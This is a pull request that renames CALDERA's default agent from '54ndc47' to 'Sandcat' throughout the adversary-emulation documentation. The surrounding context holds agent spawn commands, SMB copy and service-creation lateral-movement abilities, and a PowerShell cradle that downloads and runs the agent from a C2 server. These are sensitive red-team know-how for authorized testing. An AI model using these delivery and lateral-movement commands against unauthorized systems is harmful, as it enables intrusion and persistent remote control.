### PR TITLE
replacing 54ndc47 references with Sandcat

### DIFF
--- a/sphinx-docs/Basic-Usage.md
+++ b/sphinx-docs/Basic-Usage.md
@@ -173,7 +173,7 @@ sleep_min: 30
 untrusted_timer: 90
 watchdog: 0
 deployments:
-  - 2f34977d-9558-4c12-abad-349716777c6b #54ndc47
+  - 2f34977d-9558-4c12-abad-349716777c6b #Sandcat
   - 356d1722-7784-40c4-822b-0cf864b0b36d #Manx
   - 0ab383be-b819-41bf-91b9-1bd4404d83bf #Ragdoll
 ```

--- a/sphinx-docs/Getting-started.md
+++ b/sphinx-docs/Getting-started.md
@@ -13,7 +13,7 @@ The following steps will walk through logging in, deploying an agent, selecting 
 1) Log in as a red user. By default, a "red" user is creating with a password found in the `conf/local.yml` file (or `conf/default.yml` if using insecure settings).
 1) Deploy an agent
    - Navigate to the Agents page and click the "Click here to deploy an agent"
-   - Choose the Sandcat (54ndc47) agent and platform (victim operating system)
+   - Choose the Sandcat agent and platform (victim operating system)
    - Check that the value for `app.contact.http` matches the host and port the CALDERA server is listening on
    - Run the generated command on the victim machine. Note that some abilities will require elevated privileges, which would require the agent to be deployed in an elevated shell.
    - Ensure that a new agent appears in the table on the Agents page
@@ -50,7 +50,7 @@ The following steps will walk through logging in to CALDERA blue, deploying a bl
 1) Log in as a blue user. By default, a "blue" user is creating with a password found in the `conf/local.yml` file (or `conf/default.yml` if using insecure settings).
 1) Deploy a blue agent
    - Navigate to the Agents page and click the "Click here to deploy an agent"
-   - Choose the Sandcat (54ndc47) agent and platform (victim operating system)
+   - Choose the Sandcat agent and platform (victim operating system)
    - Check that the value for `app.contact.http` matches the host and port the CALDERA server is listening on
    - Run the generated command on the victim machine. The blue agent should be deployed with elevated privileges in most cases.
    - Ensure that a new blue agent appears in the table on the Agents page

--- a/sphinx-docs/How-to-Build-Agents.md
+++ b/sphinx-docs/How-to-Build-Agents.md
@@ -1,10 +1,10 @@
 # How to Build Agents
 
 Building your own agent is a way to create a unique - or undetectable - footprint on compromised machines. Our
-default agent, 54ndc47, is a representation of what an agent can do. This agent is written in GoLang and offers
+default agent, Sandcat, is a representation of what an agent can do. This agent is written in GoLang and offers
 an extensible collection of command-and-control (C2) protocols, such as communicating over HTTP or GitHub Gist. 
 
-You can extend 54ndc47 by adding your own C2 protocols in place or you can follow this guide to create your own agent 
+You can extend Sandcat by adding your own C2 protocols in place or you can follow this guide to create your own agent 
 from scratch.
 
 ## Understanding contacts
@@ -140,11 +140,11 @@ Additionally, you may want to take advantage of CALDERA's lateral movement track
 implementation for tracking lateral movement depends on passing the ID of the Link spawning the agent as 
 an argument to the agent's spawn command and upon the agent's check in, for this Link ID to be returned as part of the
 agent's profile. The following section explains how lateral movement tracking has been enabled for the default agent,
-54ndc47.  
+Sandcat.  
 
-### 54ndc47
+### Sandcat
 
-An example 54ndc47 spawn command has been copied from the [Service Creation ability](https://github.com/mitre/stockpile/blob/master/data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml)
+An example Sandcat spawn command has been copied from the [Service Creation ability](https://github.com/mitre/stockpile/blob/master/data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml)
 and included below for reference:
 ```
 C:\Users\Public\s4ndc4t.exe -server #{server} -originLinkID #{origin_link_id}
@@ -154,7 +154,7 @@ the populated command will appear as:
 ```
 C:\Users\Public\s4ndc4t.exe -server http://192.168.0.1:8888 -originLinkID cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81
 ```
-The 54ndc47 agent stores the value of this global variable in its profile, which is then returned to the CALDERA server
+The Sandcat agent stores the value of this global variable in its profile, which is then returned to the CALDERA server
 upon first check-in as a key\value pair `origin_link_id : cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81` in the JSON dictionary. The CALDERA server will 
 automatically store this pair when creating the Agent object and use it when generating the Attack Path graph in the
 Debrief plugin.

--- a/sphinx-docs/How-to-Build-Plugins.md
+++ b/sphinx-docs/How-to-Build-Plugins.md
@@ -2,7 +2,7 @@
 
 Building your own plugin allows you to add custom functionality to CALDERA. 
 
-A plugin can be nearly anything, from a RAT/agent (like 54ndc47) to a new GUI or a collection of abilities that you want to keep in "closed-source". 
+A plugin can be nearly anything, from a RAT/agent (like Sandcat) to a new GUI or a collection of abilities that you want to keep in "closed-source". 
 
 Plugins are stored in the plugins directory. If a plugin is also listed in the local.yml file, it will be loaded into CALDERA each time the server starts. A plugin is loaded through its hook.py file, which is "hooked" into the core system via the server.py (main) module.
 

--- a/sphinx-docs/Lateral-Movement-Guide.md
+++ b/sphinx-docs/Lateral-Movement-Guide.md
@@ -74,7 +74,7 @@ host, which moved laterally to the `VAGRANTDC` machine via successful execution 
 ![Debrief Attack Path Example](/img/debrief_attack_path.png)    
 
 This capability relies on the `origin_link_id` field to be populated within the agent profile upon first
-check-in and is currently implemented for the default agent, 54ndc47. For more information about the `#{origin_link_id}`
+check-in and is currently implemented for the default agent, Sandcat. For more information about the `#{origin_link_id}`
 global variable, see the explanation of **Command** in the [What is an Ability?](/docs/Learning-the-Terminology.html#what-is-an-ability)
 section of the Learning the Terminology guide. For more information about how lateral movement tracking is implemented 
 in agents to be used with CALDERA, see the [Lateral Movement Tracking](/docs/How-to-Build-Agents.html#lateral-movement-tracking) 
@@ -84,7 +84,7 @@ section of the How to Build Agents guide.
 ## Example Lateral Movement Profile
 This section will walkthrough the necessary steps for proper execution of the Service Creation Lateral Movement
 adversary profile. This section will assume successful setup from the previous sections mentioned in this guide and that
-a 54ndc47 agent has been spawned with administrative privileges to the remote target host. The full ability files used 
+a Sandcat agent has been spawned with administrative privileges to the remote target host. The full ability files used 
 in this adversary profile are included at the end of this guide.
 
 See a video of the following steps [here](#video-walkthrough).
@@ -129,8 +129,8 @@ drop down, try refreshing the page.
 
 ```
 - id: 65048ec1-f7ca-49d3-9410-10813e472b30
-  name: Copy 54ndc47 (SMB)
-  description: Copy 54ndc47 to remote host (SMB)
+  name: Copy Sandcat (SMB)
+  description: Copy Sandcat to remote host (SMB)
   tactic: lateral-movement
   technique:
     attack_id: T1021.002
@@ -165,7 +165,7 @@ drop down, try refreshing the page.
 ```
 - id: 95727b87-175c-4a69-8c7a-a5d82746a753
   name: Service Creation
-  description: Create a service named "sandsvc" to execute remote 54ndc57 binary named "s4ndc4t.exe"
+  description: Create a service named "sandsvc" to execute remote Sandcat binary named "s4ndc4t.exe"
   tactic: execution
   technique:
     attack_id: T1569.002

--- a/sphinx-docs/Learning-the-terminology.md
+++ b/sphinx-docs/Learning-the-terminology.md
@@ -8,7 +8,7 @@ Installed agents appear in the UI in the Agents dialog. Agents are identified by
 
 CALDERA includes a number of agent programs, each adding unique functionality. A few examples are listed below:
 
-- Sandcat (54ndc47): A GoLang agent which communicates through HTTP, Git, or P2P over SMB contacts
+- Sandcat: A GoLang agent which communicates through HTTP, Git, or P2P over SMB contacts
 - Manx: A GoLang agent which communicates via the TCP contact and functions as a reverse-shell
 - Ragdoll: A Python agent which communicates via the HTML contact
 

--- a/sphinx-docs/Plugin-library.md
+++ b/sphinx-docs/Plugin-library.md
@@ -7,17 +7,17 @@ To enable a plugin, add it to the `default.yml` file in the `conf/` directory. M
 
 Plugins can also be enabled through the GUI. Go to *Advanced -> Configuration* and then click on the 'enable' button for the plugin you would like to enable.
 
-## Sandcat (54ndc47)
+## Sandcat
 
-The Sandcat plugin, otherwise known as 54ndc47, is the default agent that CALDERA ships with. 
-54ndc47 is written in GoLang for cross-platform compatibility. 
+The Sandcat plugin contains the default agent that CALDERA ships with. 
+Sandcat is written in GoLang for cross-platform compatibility. 
 
-54ndc47 agents require network connectivity to CALDERA at port 8888.
+Sandcat agents require network connectivity to CALDERA at port 8888.
 
 ### Deploy 
 
-To deploy 54ndc47, use one of the built-in delivery commands which allows you to run the agent on any operating system. 
-Each of these commands downloads the compiled 54ndc47 executable from CALDERA and runs it immediately. Find
+To deploy Sandcat, use one of the built-in delivery commands which allows you to run the agent on any operating system. 
+Each of these commands downloads the compiled Sandcat executable from CALDERA and runs it immediately. Find
 the commands on the Sandcat plugin tab.
 
 Once the agent is running, it should show log messages when it beacons into CALDERA.
@@ -28,14 +28,14 @@ hash (MD5) and a random name that blends into the operating system. This will he
 
 ### Options
 
-When deploying a 54ndc47 agent, there are optional parameters you can use when you start the executable:
+When deploying a Sandcat agent, there are optional parameters you can use when you start the executable:
 
 * **Server**: This is the location of CALDERA. The agent must have connectivity to this host/port. 
 * **Group**: This is the group name that you would like the agent to join when it starts. The group does not have to exist. A default group of my_group will be used if none is passed in.
 * **v**: Use `-v` to see verbose output from sandcat.  Otherwise, sandcat will run silently.
 
 ### Extensions
-In order to keep the agent code lightweight, the default 54ndc47 agent binary ships with limited basic functionality.
+In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality.
 Users can dynamically compile additional features, referred to as "gocat extensions". Each extension adds to the 
 existing `gocat` module code to provide functionality such as peer-to-peer proxy implementations, additional
 executors, and additional C2 contact protocols. 
@@ -74,7 +74,7 @@ Additional functionality can be found in the following gocat extensions:
 communication via SMB named pipes).
 - `donut` extension provides the Donut functionality to execute various assemblies in memory. 
 See https://github.com/TheWover/donut for additional information.
-- `shared` extension provides the C sharing functionality for 54ndc47.
+- `shared` extension provides the C sharing functionality for Sandcat.
 
 #### Customizing Default Options & Execution Without CLI Options
 

--- a/sphinx-docs/Sandcat-Peer-to-Peer.md
+++ b/sphinx-docs/Sandcat-Peer-to-Peer.md
@@ -1,4 +1,4 @@
-# Peer-to-Peer Proxy Functionality for 54ndc47 Agents
+# Peer-to-Peer Proxy Functionality for Sandcat Agents
 
 In certain scenarios, an agent may start on a machine that can't directly connect to the C2 server. 
 For instance, agent A may laterally move to a machine that is on an internal network and cannot beacon out to the C2.
@@ -6,12 +6,12 @@ By giving agents peer-to-peer capabilities, users can overcome these limitations
 can relay messages and act as proxies between the C2 server and peers, giving users more flexibility in their
 Caldera operations.
 
-This guide will explain how 54ndc47 incorporates peer-to-peer proxy functionality and how users can include it
+This guide will explain how Sandcat incorporates peer-to-peer proxy functionality and how users can include it
 in their operations.
 
-## How 54ndc47 Uses Peer-to-Peer
+## How Sandcat Uses Peer-to-Peer
 
-By default, a 54ndc47 agent will try to connect to its defined C2 server using the provided C2 protocol 
+By default, a Sandcat agent will try to connect to its defined C2 server using the provided C2 protocol 
 (e.g. HTTP). Under ideal circumstances, the requested C2 server is valid and reachable by the agent, and no issues
 occur. Because agents cannot guarantee that the requested C2 server is valid, that the requested C2 protocol is
 valid and supported by the agent, nor that the C2 server is even reachable, the agent will fall back to
@@ -29,7 +29,7 @@ the available corresponding peer proxy locations and the associated peer proxy p
 For example, if an agent cannot successfully make HTTP requests to
 the C2 server at `http://10.1.1.1:8080`, but it knows that another agent is proxying peer communications through
 an SMB pipe path available at `\\WORKSTATION\pipe\proxypipe`, then the agent will check if it supports SMB Pipe
-peer-to-peer proxy capabilities. If so (i.e. if the associated gocat extension was included in the 54ndc47 binary),
+peer-to-peer proxy capabilities. If so (i.e. if the associated gocat extension was included in the Sandcat binary),
 then the agent will change its server to `\\WORKSTATION\pipe\proxypipe` and its C2 protocol to `SmbPipe`.
 
 The agent also keeps track of which peer proxy receivers it has tried so far, and it will round-robin through each
@@ -45,7 +45,7 @@ receivers check in through a successful beacon to the C2, the agents will includ
 addresses and corresponding protocols, if any. The C2 server will store this information to later include
 in a dynamically compiled binary upon user request.
 
-Users can compile a 54ndc47 binary that includes known available peer-to-peer receivers 
+Users can compile a Sandcat binary that includes known available peer-to-peer receivers 
 (their protocols and locations), by using the `includeProxyPeers` header when sending the HTTP requests
 to the Caldera server for agent binary compilation. In order for a receiver to be included, the agent hosting
 the receiver must be trusted, and the peer-to-peer protocol for the receiver must be included in the header
@@ -69,7 +69,7 @@ binary will contain all 3 URLs for the agent to use in case it cannot connect to
 
 To leverage peer-to-peer functionality, one or more gocat extensions may need to be installed. This can be done
 through cradles by including the `gocat-extensions` header when sending HTTP requests to the Caldera server for
-dynamic 54ndc47 compilation. The header value will be a comma-separated list of all the desired extensions
+dynamic Sandcat compilation. The header value will be a comma-separated list of all the desired extensions
 (e.g. `proxy_method1,proxy_method2`). If the requested extension is supported and available within the user's current
 Caldera installation, then the extension will be included.
 
@@ -107,7 +107,7 @@ C:\Users\Public\sandcat.exe -server http://192.168.137.122:8888 -v -listenP2P;
 #### Manually Connecting to Peers via Command-Line
 
 In cases where operators know ahead of time that a newly spawned agent cannot directly connect to the C2, 
-they can use the existing command-line options for 54ndc47 to have the new agent connect to a peer. 
+they can use the existing command-line options for Sandcat to have the new agent connect to a peer. 
 To do so, the `-c2` and `-server` options  are set to the peer-to-peer proxy protocol and address of the 
 peer's proxy receiver, respectively.
 
@@ -151,14 +151,14 @@ C:\Users\Public\sandcat.exe -server \\WORKSTATION1\pipe\agentpipe -listenP2P
 
 ## Peer-To-Peer Interfaces
 
-At the core of the 54ndc47 peer-to-peer functionality are the peer-to-peer clients and peer-to-peer receivers.
+At the core of the Sandcat peer-to-peer functionality are the peer-to-peer clients and peer-to-peer receivers.
 Agents can operate one or both, and can support multiple variants of each.  For instance, an agent that cannot
 directly reach the C2 server would run a peer-to-peer client that will reach out to a peer-to-peer receiver running
 on a peer agent. Depending on the gocat extensions that each agent supports, an agent could run many different types
 of peer-to-peer receivers simultaneously in order to maximize the likelihood of successful proxied peer-to-peer
 communication. 
 
-Direct communication between the 54ndc47 agent and the C2 server is defined by the Contact interface in the contact.go
+Direct communication between the Sandcat agent and the C2 server is defined by the Contact interface in the contact.go
 file within the `contact` gocat package. Because all peer-to-peer communication eventually gets proxied to the C2 
 server, agents essentially treat their peer proxy receivers as just another server. 
 
@@ -174,7 +174,7 @@ within the `proxy` gocat package. Each implementation requires the following:
 
 ### HTTP proxy
 
-The 54ndc47 agent currently supports one peer-to-peer proxy: a basic HTTP proxy. Agents that want to use the HTTP
+The Sandcat agent currently supports one peer-to-peer proxy: a basic HTTP proxy. Agents that want to use the HTTP
 peer-to-peer proxy can connect to the C2 server via an HTTP proxy running on another agent. Agent A can start an
 HTTP proxy receiver (essentially a proxy listener) and forward any requests/responses. Because the nature of an
 HTTP proxy receiver implies that the running agent will send HTTP requests upstream, an agent must be using the HTTP
@@ -183,11 +183,11 @@ c2 protocol in order to successfully provide HTTP proxy receiver services.
 The peer-to-peer HTTP client is the same HTTP implementation of the Contact interface, meaning that an agent simply
 needs to use the `HTTP` c2 protocol in order to connect to an HTTP proxy receiver.
 
-In order to run an HTTP proxy receiver, the 54ndc47 agent must have the `proxy_http` gocat extension installed.
+In order to run an HTTP proxy receiver, the Sandcat agent must have the `proxy_http` gocat extension installed.
 
 #### Example commands:
 
-Compiling and running a 54ndc47 agent that supports HTTP receivers:
+Compiling and running a Sandcat agent that supports HTTP receivers:
 ```
 $url="http://192.168.137.122:8888/file/download";
 $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); 

--- a/sphinx-docs/The-REST-API.md
+++ b/sphinx-docs/The-REST-API.md
@@ -107,7 +107,7 @@ Files can be dowloaded from CALDERA through the /file/download endpoint. This en
 
 Files can also be downloaded indirectly through the [payload block of an ability](Learning-the-terminology.md).
 
-> Additionally, the [54ndc47 plugin](Plugin-library.md) delivery commands utilize the file download endpoint to drop the agent on a host
+> Additionally, the [Sandcat plugin](Plugin-library.md) delivery commands utilize the file download endpoint to drop the agent on a host
 
 #### Example
 ```bash


### PR DESCRIPTION
## Description
Removing 54ndc47 references in documentation and replacing them with "sandcat".

## Type of change
- [x] This change requires a documentation update

## How Has This Been Tested?
Ran server and verified that the new documentation no longer shows 54ndc47 references (aside from referenced yaml)

## Checklist:
- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [x] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
